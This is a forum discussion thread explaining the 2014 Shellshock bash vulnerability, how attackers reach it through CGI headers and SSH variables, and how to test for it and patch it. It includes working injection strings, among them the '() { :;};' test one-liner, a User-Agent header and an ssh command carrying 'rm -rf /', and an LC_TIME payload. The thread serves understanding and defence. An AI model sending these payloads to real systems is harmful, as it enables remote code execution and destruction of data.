There's some misunderstanding of how the one-liner works, so here's a writeup.
You can break the one-liner into two lines to see what is happening.
1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. bash: warning: badvar: ignoring function definition attempt
4. bash: error importing function definition for `badvar'
5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash spots the specially formed variable (named badvar), prints a warning,
4. ...and apparently doesn't define the function at all?
5. But other than that, the child bash runs as expected.
And now the same two input lines on and OLD bash:
1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. vulnerable
4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!
4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)
Lots of internet facing software fills env vars with user data: Apache may set several SSL_* vars and HTTP_* vars, ssh may set LC_*, LANG, TERM, etc; procmail and other smtp filters probably have their fair share too.
The moment any child process of these hit a system() or popen() like call, /bin/sh initializes and may hit the bug.
So it's a sort of injection attack that targets inputs to bash that manage to bypass normal sanitisation?
Apache takes SSL_* headers, say, from a client and simply passes those to BASH and this exploit means that BASH will execute a payload dropped in to the header?Am I close? Wouldn't that also be an Apache [httpd] bug in that it's allowing unsanitised user data to hit the shell?
Similarly are you saying that if I set a LANG variable and SSH to a server that the server will use that variable to give to BASH, even if it's not a recognised LANG variable?
Perhaps I'm misunderstanding as such things would be massive holes any way regardless of this BASH issue.
From the example code at the top of the thread it seems that you only need to affect a single variable, that bash reads, in order to pwn the whole server.
Interestingly on Ubuntu the BASH update for this is rated "medium".
It's kind of the equivalent of a web app that basically evals any given GET parameter with a specially crafted value.
Apache sets environment variables, it does not pass user input directly to bash as code or anything like that. The fact that bash can be tricked to execute this code is a problem that needs to be addressed by bash, not any other software.
>"Apache sets environment variables, it does not pass user input directly to bash as code or anything like that." //
This is contrary to how I'm understanding the situation. BASH, or whichever shell is being used, sets environment variables; Apache httpd et al. pass off some user data (from clients, eg browser headers) to the shell to set variables under limited circumstances [like use of CGI], no? Then when BASH gets initialised something is happening in the parsing of variables causing statements included with the variable (which variable can be a function definition) to be executed.
I realise now that as things stand you can't sanitise many of the fields [like http client headers] as they don't have well defined forms. But setting variables for use by BASH seems as close to "pass user input directly to bash" as you're going to get.
Mainly I'm doubting that all these different apps duplicate code to set env variables when the shell already knows how to do it, doesn't seem very *nixy. Happy to be corrected as I'm - as I'm sure you've guessed - a bit out of my depth.
Sorry for the late reply -
you can think of environment variables as basically HTTP headers for bash scripts. They are one way to pass user input to a bash script. While you want bash to make those environment variables available to the bash script, you don't really want any code in their value to be executed (unless, of course, your script does that on purpose).
httpd with CGI does not alter your bash script by prepending a set of variable assignments (which, of course, would be a very bad idea) - it simply sets values that are then passed to bash. The bash parser then can be tricked into executing code in those environment variables.
In a webserver, like Apache, environment variables are set from headers sent by the client, e.g. each header like Cookie would produce variable like HTTP_COOKIE. These variables can contain any data that the user sent. If Apache uses external code (like PHP, Ruby, Python, etc.) to process the request, it may pass these variables to that code, and if that code runs some command on the system, these variables may be passed to the command shell, which would lead to code contained in the variable to be executed at that point.
This can also happen with other service processes - such as OpenSSH, that sets ORIG_SSH_COMMAND variable to the command that the user supplies. That may allow people to break out of restricted accounts -i.e. accounts that are supposed to run just one command (ssh-based services, like SVN or Git, may be an example) and run arbitrary commands under such user.
As an analogy, suppose I go to a website written in PHP and register with the username "Robert'); DROP TABLE Students;--". A correct PHP script will sanitize the name; it'll escape the quote and run something like `update users set name='Robert\'); DROP TABLE Students;--'`. If mysql then ignores the backslash and drops the Students table, that is definitely a mysql problem and not a PHP problem. Doing any more on the PHP side to "sanitize" the name would actually break the script by screwing up valid names.
In this case, the shell variables are correctly sanitized by Apache or whatever, and then mishandled by bash. For example, imagine this very simple system:
- Web server receives a GET request with the user's name.
- Web server sets the environment variable USERS_NAME='<whatever was submitted with quotes escaped>'.
- Web server sends back the result of running `bash print_welcome_message.sh`.
It might not be considered great design, but there's nothing inherently insecure in this system, and there are plenty of actual systems that more or less work this way. And it's also perfectly valid for a user to have the name `() { :;}; echo vulnerable`. It ought to work fine to set USERS_NAME to that value and send back `Welcome, () { :;}; echo vulnerable.`
Instead, an unpatched bash will execute the contents of USERS_NAME. The only way for the web server to prevent that would be to change the user's name, which would be wrong behavior -- given a properly working shell, it would print the wrong name in the response. The web server does its sanitization job correctly when it successfully sets USERS_NAME in spite of any single quotes or what-have-you -- this part isn't its problem.
CGI scripts is the most obvious way - when executing a CGI script, each HTTP header gets translated into an environment variable - but I have no doubt there's all sorts of odd network-facing apps which set environment various and then run a command, even if you're not running CGI scripts.
Surely though the CGI framework sanitises the headers first? Otherwise this seems like it's a pretty predictable problem - isn't "always sanitise user data" the cardinal rule of backends.
I can certainly imagine that I might have designed a web page that passed user input direct to a BASH script to do a ping or some such, but not if it's public facing.
What sanitization do you expect the CGI framework to apply to the header value representing the user agent? str_replace($userAgent, '() {', 'no bash bug for you')?
Only a few environment variables are given any meaning by the system. Other environment variables don't have any predefined meaning and can be any null-terminated string.
Indeed, lol. It's a bit clearer to me now. Thanks for your comment.
It seems like a sort of loose typing issue. Perhaps if when setting environment variables the app using them could specify a type (eg nonExecutableText) such that bash knows it's receiving textual content that mustn't be executed; would that help?
That's not really the risk with this vulnerability. Piping a web-sourced script to bash has always been a vulnerability, but it's one that you choose to live with when you do it.
The reason this is newsworthy is because there are some network-facing programs (CGI-based web servers, some SSH configurations) that will set the value of some environment variables to a user-supplied value, which bash will then be executed by bash when that program spawns a new process.
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
So, as a amateur sysadmin of a decently popular side project, what should I do? I've read over the post on the mailing list, and I think I understand the basic attack, but I'm having trouble understanding exactly how an attacker could run bash on my server and what I therefore need to patch (though I suspect that's intentional). Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?
If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`
Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?
Upgrades should not require any restarts, and no restarts are required for you to stop being vulnerable - as this only affects newly created bash sessions, not already running ones.
Debian's package manager has the nasty habit of stopping affected daemons before all the upgrades and starting them afterwards, leaving you with serious downtime.
> Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?
I don't think it will, for a couple of reasons. OpenSSL is integrated into other services as a library, while bash would be called as an external application. I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.
It appears that Linode changes /etc/apt/sources.list to point to their own mirror of Ubuntu repositories, and as far as I can tell those are not updated yet. So I guess the solution is to wait or edit sources.list. Just FYI if you're on their systems!
For releases in-between, you should be able to manually download one of those versions from http://archive.ubuntu.com/ubuntu/pool/main/b/bash/ and install it. I wonder how many vulnerable boxes there are that won't get these updates because Ubuntu stops support after 9 months. There must be tons of boxes running 13.10, it's not even a year old yet.
It probably ensures that you get the Linode-customized flavors of packages where such exist, so that, for example, you don't inadvertently upgrade your kernel to a build without the ability to mount Linode disks.
Linode can't modify packages; they're signed by the upstream distro. (Unless Linode added a key of their own to your apt keychain (apt-key list), but I've never seen that.)
fwiw, Linode's mirrors are up with the latest version yet Digital Ocean's are not. I lose faith in DO everytime I remote into my VM. They just seen like an amateurish shop.
Debian security updates are distributed from security.debian.org, which is separate from the normal Debian mirror network, and Debian discourages the mirroring of security.debian.org because security updates are time sensitive. Hopefully Digital Ocean is not mirroring security.debian.org.
If I understood this bug correctly, it happens during bash's initialization. If I'm right, already running instances of bash are not vulnerable, and new instances will use the fixed executable, so no reboot would be necessary for this bug.
$ apt-cache show debian-goodies
<SNIP>
checkrestart - Help to find and restart processes which are using old
versions of upgraded files (such as libraries)
I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.
You might also look into changing the default shell (but beware, scripts with bashisms in them...).
you should update all security updates, reliably, periodically, regardless of HN posts.
you're probably not directly vulnerable for this very vuln, but then again, maybe you are. with enough vulns it gets complex enough to check that its easier to just update with all the security updates..
We just updated our scanner and included this CVE. You can run Detectify to see if your setup is vulnerable. We offer a recurring service that runs continuously and alerts you if you are exposed to new emerging vulnerabilities. This removes some of the complexity of always being on top of security alerts.
Looks like the patched version and the pre-patched version show the same version, or am I being stupid and missing something ?
ayourtch@mcmini:~/bash-patch$ ls
bash_4.2-2ubuntu2.2_amd64.deb bash-builtins_4.2-2ubuntu2.2_amd64.deb t
ayourtch@mcmini:~/bash-patch$ dpkg -x bash_4.2-2ubuntu2.2_amd64.deb t
ayourtch@mcmini:~/bash-patch$ diff -c t/bin/bash /bin/bash
Binary files t/bin/bash and /bin/bash differ
ayourtch@mcmini:~/bash-patch$ t/bin/bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ayourtch@mcmini:~/bash-patch$ /bin/bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ayourtch@mcmini:~/bash-patch$ sha1sum t/bin/bash
9eeed02173db163b013933eff3b8c6aa3697f67f t/bin/bash
ayourtch@mcmini:~/bash-patch$ sha1sum /bin/bash
3384fadf84146a4d4b6b7f529f615e9947b4ac99 /bin/bash
ayourtch@mcmini:~/bash-patch$
"If you are responsible for the security of any system, this is your immediate, drop-everything priority."
Why don't you explain in plain english exactly why you feel this is the case? "Drop-everything" in other words (or even close to that). Give some scenarios. After all anyone who knows a great deal doesn't need that advice the people who need that advice are ones that don't know enough to know what the impact of this is. [1]
Perhaps you could clarify with some examples of why (see child comment "So, as a amateur sysadmin of a decently popular side project") you think this applies to anyone who is "responsible for the security of any system"?
[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.
Any library anywhere in any application you run that calls out to bash that is called by any other library in that application, so long as that application is somehow hooked up to a web server, is potentially an unauthenticated GET request away from code execution; the exploit for this is potentially so simple that attackers can craft a single request, spider the Internet, and collect shells from applications you run that you forgot you even ran, at which point they'll own your whole data center.
So for example if you don't run web servers that are front facing on the internet (and you trust your (for example) intranet) then does this become an "asap" rather than a "drop everything"?
"is potentially an unauthenticated GET request"
Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?
The attack surface of this bug may very well be the largest attack surface of any bug in history. Update bash. Just update bash. Everywhere. On everything you have it on. Don't think about whether, just think about how.
(Note I'm not claiming this is the "worst bug ever"... there's stiff competition for that claim. But most of the rest of the "worst bug ever"s I can think of are some point that failed, some particular thing you could do for full root access or something. I can't think of anything else with this sheer staggering surface area.)
Unauthenticated GET requests were just an example of something that can invoke this behavior. If you have any network-enabled service that's capable of spawning a shell, you can have attack vectors open.
Possible vectors include things like DHCP clients, SSH, web servers, etc. Lots of things open shells for reasons you wouldn't intuitively expect. It's very likely that there are many creative vectors for exploitation that will be discovered in the coming hours.
I ask because I've seen SSIDs with meaningful characters ()<>;? cause trouble with some network managers. I presumed at the time that this was due to the SSID string being passed as an argument to some script.
I've encountered this on my old Android phone and my old Debian laptop. I encountered it often because a friend of mine used to have an emoticon in the SSID for his home router. (Really annoying! I couldn't connect to anything when his router was in range.)
Note: it could very well have been a different problem. I didn't investigate.
Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?
Usually no. This exploit should be vulnerable to any HTTP method. "unathenticed GETs" are the lowest security level of HTTP calls, so if they can be used as an attack vector, you should pay attention.
Because this allows execution of arbitrary commands from any unsantized environment variable.
Web servers pass information about the HTTP client to CGI scripts using environment variables. A CGI script written in bash would be vulnerable to arbitrary command execution if any HTTP header contained the vulnerable string.
GET / HTTP/1.0
User-Agent: () { :; }; rm -rf /
Restricted SSH accounts (like the ones used by GitHub) have a setting to restrict the user to a specific command (e.g. /usr/local/bin/run-git-only --github-user=octocat). The original command is passed in an environment variable SSH_ORIGINAL_COMMAND. If bash is used anywhere along the way (say, if /usr/local/bin/run-git-only --github-user=octocat is a shell script), then this is a problem:
ssh git@example.com '() { :; }; rm -rf /'
There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.
Edit: as others have pointed out, even non-bash CGI scripts that use a shell to run external processes are vulnerable For example, system("/usr/local/bin/whatever --some-fixed-option") would normally be considered safe since there's no untrusted data in the command-line (although perhaps it would be considered poor design), but it'll run a shell to do the whitespace splitting. If that shell is bash....
At least SCRIPT_FILENAME is user input isn't it? I'm really not sure but like to have some clarity. It should not work because it's likely impossible to have () at the beginning of the SCRIPT_FILENAME? but can someone give some hints? It's common to have bash/sh wrapper script: https://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html#exampl...
IIUC, you're already pwned after the first line of your wrapper script, i.e. #!/bin/bash, as your CGI environment was already set before, and now you're running bash in it (unless FastCGI works differently, not by setting the environment as plain old CGI; I don't know FastCGI, but from a quick glance I think it works similarly)
FastCGI does work differently – it spawns a process which stays open and communicates with it over stdin / stdout – but that doesn't mean that his PHP script doesn't unexpectedly invoke system() somewhere.
This script here is run when the process is spawned and spawns the PHP process that listens to stdin/stdout. Similar scripts exist in most install of mod_fcgid. E.g. PLESK, Virtualmin, other ISP-Panels... It boils down to look at what environment variables are there when bash runs this script or not? Once bash starts and grabs the environment variables the exploit starts.
So considering there are other variables in there that can be manipulated it would be possible to own a large chunk of servers on the Internet. However I'm not sure if there is caveat and I had hoped that someone can help me.
Edit: Looks safe. These variables are not even there. It's just an outdated script.
I'm a relative newcomer to the command line and have been Googling around for what exactly the () {:;} is doing with no luck. Does anyone have a good link or explanation?
There is a reason PHP is to be kept away and not touched with a ten meter stick, it seems to spawn a shell for weird reasons, I dont think python or groovy apps do that. They're safe, unless you somewhere specifically invoke System.getRuntime().run("bash");
PHP never "spawns shell for weird reasons" - it would spawn shell if you ask it to spawn shell. Just as any other language would, if you ask it. Still, many apps may use shell indirectly - e.g. to execute some system function, to call out to some tool, etc. - and those may be vulnerable even if original code was not CGI script. Moreover, you don't have to run specifically bash - any command execution may go through shell, which may be bash, e.g. Runtime.getRuntime().exec() in Java. Thus it may be not very easy to pinpoint all the places where this bug could sneak in.
> groovy apps do that [... if] you somewhere specifically invoke System.getRuntime().run("bash");
That's a one-liner in Groovy, written in the Java style of chained method calls, which is the direct equivalent of spawning a shell in non-JVM languages, so that's not an argument for using Groovy instead of PHP.
If bash is invoked at any point in the response cycle you are pwned; not just if you are directly exposing a shell script. How confident are you that this never happens on any computers anywhere on your network ever?
That's ridiculous. You may as well say that every time you put a python script up, you're exposing the entire Python runtime and deserve to get 'pwned'.
The scope of the risk is limited to script that you write, whether bash or Python.
To be fair, with all the various ways how shell scripts (not only in bash) interpolate, evaluate, substitute etc., the typical shell language is much, much harder to keep safe against code injection than say Python (or even PHP). After all, code injection/evaluation is actually what you want in a shell script, half of the time.
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)
This applies even if your shell script or shell snippet uses the full paths to commands. For instance:
Attacker-controlled environment variable names are a rare scenario, and one that probably has you hosed no matter what. Attacker-controlled environment variable values, on the other hand, are not so rare, and if not for this vulnerability they wouldn't be a problem.
More specifically: The environment in general is an attack vector. I mean, it's global input that crosses execution domains! Any name/value pair could potentially mess with any number of programs in unexpected ways. A user should not be able to control any environment changes, period. Of course, whether or not this is practical is an exercise for the sysadmin.
It's not just you. The fact that an environment variable can override e.g. "git" to do something else is a real problem requiring separate protection. However, that's effectively PATH injection rather than code injection so it's already addressed in many cases.
I agree. In the next few months, we'll probably be finding out about some of the cases where neither existing sanitization nor the half-fix for this problem was sufficient to prevent exploits in this family. :(
The vulnerability was released, what, a few hours ago? With a major vulnerability, waiting around for a "proper" fix is probably not a good idea. Get in a hot-patch to minimize the damage, then work on a "proper" fix...
Can anyone confirm that this is still a security issue?
My reading of this is that it's weird, and it's certainly a bug in the parser, but because you don't get to put the executable code in the environment variable it's not an RCE exploit like the last bug was.
Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?
Of course, that doesn't mean there isn't one. It's clearly a reasonably significant issue - the setting of environment variables can cause unintended file system writes (and the same parsing bug can be used for reads) - and you're better off assuming that someone will determine an exploit based on it.
That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.
edit: OK, I give. I don't understand how this is different from,
env z='' echo oops
So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,
'' evil command here
...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused function embedded in environment variables to be executed when they were read.
I know you're just teasing, but I've got a machine with an arch install from over two years ago that's still running great. Just did an -Syyu to get bash updated.
I've got a Debian VM I maintain for giggles, and just out of masochism I've been running "apt-get update" and "apt-get upgrade" for a while and watching nothing change.. Am I doing something wrong or is the whole process just slow?
deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free
Yeah, I was current yesterday and I'm current today, with both apt-get update and upgrades. Your version number is lower than mine, you must be on either stable or testing.
ii bash 4.3-9 i386 GNU Bourne Again SHell
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
From the FAQ:
> Does sid have security updates?
Not in the same sense that stable does. If the maintainer of a package fixes a security bug and uploads the package, it'll go into sid by the normal means. If the maintainer doesn't do that, then it won't. The security team only covers stable (and possibly testing... there's a pending issue for that case).
This is what happens when you have two different processes doing IPC using a human interface mechanism.
Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.
The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:
#assume that your sources are in /src
cd /src
wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
#download all patches
for i in $(seq -f "%03g" 0 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
tar zxvf bash-4.3.tar.gz
cd bash-4.3
#apply all patches
for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
#build and install
./configure && make && make install
Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??
Or you could just download a bash-static deb from 10.04 (https://launchpad.net/ubuntu/lucid/+package/bash-static) and overwrite /bin/bash. It shouldn't cause any issues when upgrading, though you could back up the original.
8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.
A target patched for CVE-2014-6271 will output the date upon executing that PoC (Proof of Concept):
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Thu Sep 25 17:52:32 EDT 2014
There is a new update (#26) for bash 4.3 which fixes CVE-2014-7169 (the old bash update was still flawed/incomplete as demonstrated above by executing the PoC). So, taking into account what everyone before contributed, the new complete patch code would be:
This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.
I found a source copy at https://launchpad.net/ubuntu/+source/patch/2.5.9-4 and built/installed that first. The resulting fix appears to work (after copying resulting bash to /bin as noted elsewhere).
I had the same problem. I needed to install patch, make and gcc. So I downloaded the iso from http://old-releases.ubuntu.com/releases/hardy/ and then edited /etc/apt/sources.list so my server would look on the cd for the packages. I could then use 'apt-get install' to install the required programs.
I also found that the 'do' command was throwing up an error. Rather than work out why I just manually downloaded the 26 patches and then manually applied them as well. Yeah ok I'm a noob but it worked.
I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.
Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.
On Ubuntu, you'll probably want to ./configure --prefix=/usr/bin . If you install in /usr/local/bin (the default), bash will effectively no longer be updated by apt-get.
That script assumes that it is executed as root.
There's indeed a possible problem with /usr/local/bin/bash vs. /bin/bash with Ubuntu update from 8.04 to 10.04 (since Ubuntu 8.04 itself is no longer updateable), thus I asked that question in the end of my post. To mitigate it, one can just add:
I tried this and realized, it installs the binary under /usr/local/bin. you'll need to make a symlink or preferably follow ricilake's advice. if you forget to do this and logout, you may never log back in. Btw, the path to the bash in ubuntu is /bin/bash not /usr/bin/bash
I successfully patched my 8.04 server and passed the test.
I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.
Hi, I have tried to follow the instruction given by rtmdivine to patch for CVE-2014-6271 but at the end of the process I still get the date. Any suggestions? Thanks
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.
Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.
I am sure tons of people reading already know this, but I have a habit of saying this everywhere I see system() mentioned anywhere on the internet, just in case somebody reading is tempted to use it: system() is evil, please for the love of god never use it.
If you need to invoke another program use execve() and friends. The versions that end in -p will even check PATH for you. You don't need a shell to evaluate your arguments. Cut out the middle man and pass the arguments directly. It will save you a lot of stupid bugs.
There's nothing wrong with using system anywhere you would happily cover your eyes and paste the string content into a shell. That shouldn't be many places, if anywhere, in production software. It's fine for simple things that would've been shell scripts anyway but for the need to XYZ.
The API for system() is not great, but the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting. As long as you're not passing arguments from outside sources to the command, using system() should be OK.
> the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.
Maybe not in C, but they are a drop-in replacement in just about every scripting language. Perl, Ruby, Python, all have nice high level calls that mostly mimic system() but use execve underneath—You simply pass system() multiple arguments instead of a single string. `system("")` in your production web app server code is almost certainly incorrect.
Sadly I think PHP still doesn't have this.
> As long as you're not passing arguments from outside sources to the command, using system() should be OK.
Very true, but think about whether you really need a shell to launch your command (are you using any shell features?). If not, why not just launch the command directly?
Would you execute random Perl or Python code from the internet? No, you wouldn't, even if you tried to sanitize it a thousand ways from Sunday. So why would you do so for the shell?
Defense must use different strategies than offense. An engineer's goal should be to reduce the problem space to something as small as possible, so he has a better chance at implementing a correct solution. Allowing the shell to be invoked is a good way to explode your exploitable surface area.
Anybody who coded in the 1990s knows to stay away from the shell like the plague, even though the syntax parsing and evaluation components in modern shells have improved considerably. Sadly this particular bug harks back to the bad days, when it was more difficult to tell how certain constructs would be evaluated.
It's not that you can't theoretically do it securely, it's just that you're gratuitously playing with fire--fire that has burned countless engineers in the past. The cost+benefit is so indisputably skewed toward little cost and huge risk that it's unprofessional to suggest otherwise.
The shell shouldn't come anywhere near network-facing software, period.
> are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.
I never claimed it as a drop-in replacement. I think you know the solution to these problems. (I guess maybe someone who naively uses system() might not, so perhaps I need to work on a better spiel.)
> As long as you're not passing arguments from outside sources to the command, using system() should be OK.
Personally I've seen too many bad uses of system() to make that a thing. Maybe they'll not realize it's subject to PATH and that PATH can be untrusted. Maybe they'll not realize they sometimes have asterisks and spaces in a filename. And so forth...
Debian7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):
[arch/testbed ~] uname -a
Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
[arch/testbed ~] env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
Squeeze doesn't have regular security support anymore. A subset of packages on i386 and amd64 are receiving long term security support, but you need to enable the Squeeze LTS repo:
Last dist-upgrade was about a week ago, all indications point towards the bash released back in Jan 2013. It's fixed in 4.2+dfsg-0.1+deb7u1 and I'm running 4.2+dfsg-0.1
Well, that's very odd because that command reports vulnerable on an unpatched Debian system, but fails with exactly that error message on a patched system.
You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!
/bin/sh depends on the system. It might be busybox or a minimal shell (this is common on embedded devices). On some systems like OSX and I think CentOS /bin/sh is just bash. You can check with `/bin/sh --version`.
That's true of any code execution vulnerability, though - it seems odd to call out the privilege elevation specifically. If that's all the GP meant, then sure, I fully grok.
I think it comes down to a jargon vs technical language thing. In formal settings arbitrary code execution is a different thing from privilege escalation. In casual jargony talk though, security guys tend to equate code execution with privilege escalation with box ownage.
Basically it goes "why would anyone not follow the execution -> escalation -> own path?" It's such an automatic assumption, combined with the basic premise of "there's no such thing as a secure computer", that the exact details are a hand-wave. This comes from the repeated demonstration that it's almost always true.
None of this seems crazy unlikely, but I'd still like to hear a confirmation that that's what was meant. Especially since korzun was talking specifically about Debian and Ubuntu where bash is only used as a login shell and so presumably those with access could already just run the app.
That recommends changing broken scripts to #!/bin/bash or changing to sh == bash as solutions. I would guess that there are going to be plenty of easily vulnerable debian/ubuntu systems.
More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating", the are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.
'More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating", the are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.'
It doesn't matter for security. It matters a lot for my understanding of what's going on.
Most code executions vulnerabilities aren't remotely accessible, which this is, which makes priv-escalation particularly nasty. (eg: incorrectly assuming that since www-data user doesn't have access to anything sensitive, this bug isn't a big deal)
Yes, potentially - if at any point during the execution of a program (or its descendents) a bash script gets called with an untrusted environment variable value from a remote source. The difference between a system with bash as /bin/sh and a system with dash as /bin/sh is that the bash system is implicitly executing bash all the time, whereas the dash system requires an explicitly-bash script to be executed. So the dash system has many fewer windows of opportunity for an exploit, but they could still be there.
Well, sure. It seems a slightly odd way to phrase it if that's the entirety of what korzun meant, though. Is there somewhere that happens in a typical out-of-the-box Debian or Ubuntu box?
Passing executable code in environment variables is an incredibly bad idea.
The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.
The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.
But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.
Basically this is a misfeature that must be rooted out, pardon the pun.
I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?
Edit: From my experiments, the name in (a) doesn't matter, and "echo" and "date" can be changed. The thing in echo's position is where the output goes (and can be an absolute path!), and "date" is a command that is run. Still no idea how it works, as I'm not very familiar with shell syntax and Googling symbols like "=>" is mostly useless. It may even be meaningless and is just garbage to get bash into a state that causes this to happen?
Edit 2: http://seclists.org/oss-sec/2014/q3/679 has a small example. "Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though"
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.
Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.
Have you ever looked at the backend web interface of some of the most popular residential wifi routers? It's shell script. Why? It's a cheap and accessible interpreted language; no need to clutter up your tiny embedded OS with the huge requirements of php, perl, etc when you have all the tools you need in busybox.
CGI apps execute shell scripts all the time. Even if an app executes an app executes an app executes an app, if that app four layers down runs a shell script, the environment is still passed down. Turtles, dude.
It could be a simple one-line script that wraps the real command, setting memory limits and the like first. (I used a similar trick to prevent Skype using up all my memory in the past.)
Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.
On most systems I've found this works:
LC_TIME='() { :;}; echo vulnerable' ssh <hostname>
Not sure of the impact of this, as the user would need to have a remote permissions anyway for the SSH login to occur. But if there was some form of restricted shell that then spawned bash it might potentially create an attack vector.
I was wondering about this too. My thinking was, if a user's laptop is compromised (and has the exploit in LC_TIME, TERM or similar), and the user then SSH in to a server with exploitable bash, the nefarious command will presumably be executed without the user knowing. But of course, if the laptop is compromised that badly, it could probably wreak havoc to the server anyway.
